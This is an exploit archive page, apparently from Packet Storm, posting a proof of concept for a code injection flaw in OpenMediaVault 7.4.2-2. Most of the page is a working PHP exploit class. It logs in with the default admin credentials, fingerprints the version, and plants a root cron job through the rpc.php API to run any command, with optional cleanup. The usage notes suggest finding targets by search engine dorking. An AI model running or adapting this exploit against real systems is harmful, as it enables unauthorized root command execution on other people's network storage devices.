what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

OpenMediaVault 7.4.2-2 Code Injection

OpenMediaVault 7.4.2-2 Code Injection
Posted Oct 7, 2024
Authored by indoushka

OpenMediaVault version 7.4.2-2 suffers from a PHP code injection vulnerability.

tags | exploit, php
SHA-256 | dee3901417baed652d3fc04ebaed8cad97b0a4d6b6b57d600f69ac46177f5cc4

OpenMediaVault 7.4.2-2 Code Injection

Change Mirror Download
=============================================================================================================================================
| # Title : OpenMediaVault 7.4.2-2 Code Injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits) |
| # Vendor : https://www.openmediavault.org/ |
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] uses the CURL library for sending HTTP requests and handles JSON parsing for interaction with the OpenMediaVault API.

[+] Line 148 set your target .

[+] save code as poc.php .

[+] USage : cmd => c:\www\test\php poc.php

[+] PayLoad :

<?php

class OpenMediaVaultExploit
{
private $targetUri;
private $username;
private $password;
private $persistent;
private $cronUuid;
private $versionNumber;

public function __construct($targetUri, $username, $password, $persistent = false)
{
$this->targetUri = $targetUri;
$this->username = $username;
$this->password = $password;
$this->persistent = $persistent;
}

private function sendRequest($url, $data)
{
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($data));
curl_setopt($ch, CURLOPT_HTTPHEADER, [
'Content-Type: application/json'
]);
$response = curl_exec($ch);
curl_close($ch);

return json_decode($response, true);
}

public function login()
{
echo "Authenticating with OpenMediaVault using credentials {$this->username}:{$this->password}\n";

$data = [
'service' => 'Session',
'method' => 'login',
'params' => [
'username' => $this->username,
'password' => $this->password
],
'options' => null
];

$response = $this->sendRequest($this->targetUri . '/rpc.php', $data);
return isset($response['authenticated']) && $response['authenticated'] === true;
}

public function checkTarget()
{
echo "Trying to detect if target is running a vulnerable version of OpenMediaVault.\n";

$data = [
'service' => 'System',
'method' => 'getInformation',
'params' => null
];

$response = $this->sendRequest($this->targetUri . '/rpc.php', $data);
return $response;
}

public function checkVersion($response)
{
if (!empty($response)) {
$version = $response['response']['version'] ?? null;
return !is_null($version) ? preg_replace('/\s+/', '', explode('(', $version)[0]) : null;
}
return null;
}

public function executeCommand($cmd)
{
echo "Executing command...\n";

$schedule = $this->versionNumber >= '6.0.15-1' ? ['*'] : '*';
$uuid = $this->versionNumber <= '3.0.15' ? 'undefined' : 'fa4b1c66-ef79-11e5-87a0-0002b3a176b4';

$data = [
'service' => 'Cron',
'method' => 'set',
'params' => [
'uuid' => $uuid,
'enable' => true,
'execution' => 'exactly',
'minute' => $schedule,
'hour' => $schedule,
'dayofmonth' => $schedule,
'month' => $schedule,
'dayofweek' => $schedule,
'username' => 'root',
'command' => $cmd,
'sendemail' => false,
'comment' => '',
'type' => 'userdefined'
],
'options' => null
];

$response = $this->sendRequest($this->targetUri . '/rpc.php', $data);
$this->cronUuid = $response['response']['uuid'] ?? '';
$this->applyConfigChanges();
echo "Cron payload execution triggered.\n";
}

public function applyConfigChanges()
{
$data = [
'service' => 'Config',
'method' => 'applyChangesBg',
'params' => [
'modules' => [],
'force' => false
],
'options' => null
];

$this->sendRequest($this->targetUri . '/rpc.php', $data);
}

public function removePayload()
{
if (!$this->persistent) {
$data = [
'service' => 'Cron',
'method' => 'delete',
'params' => [
'uuid' => $this->cronUuid
]
];

$response = $this->sendRequest($this->targetUri . '/rpc.php', $data);
if ($response) {
$this->applyConfigChanges();
echo "Cron payload entry successfully removed.\n";
} else {
echo "Cannot access cron services to remove payload.\n";
}
}
}
}

// Usage
$exploit = new OpenMediaVaultExploit('http://target-uri', 'admin', 'openmediavault', false);
if ($exploit->login()) {
$response = $exploit->checkTarget();
if ($response) {
$exploit->versionNumber = $exploit->checkVersion($response);
$exploit->executeCommand('your-command-here');
$exploit->removePayload();
}
}

?>



Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    60 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    44 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close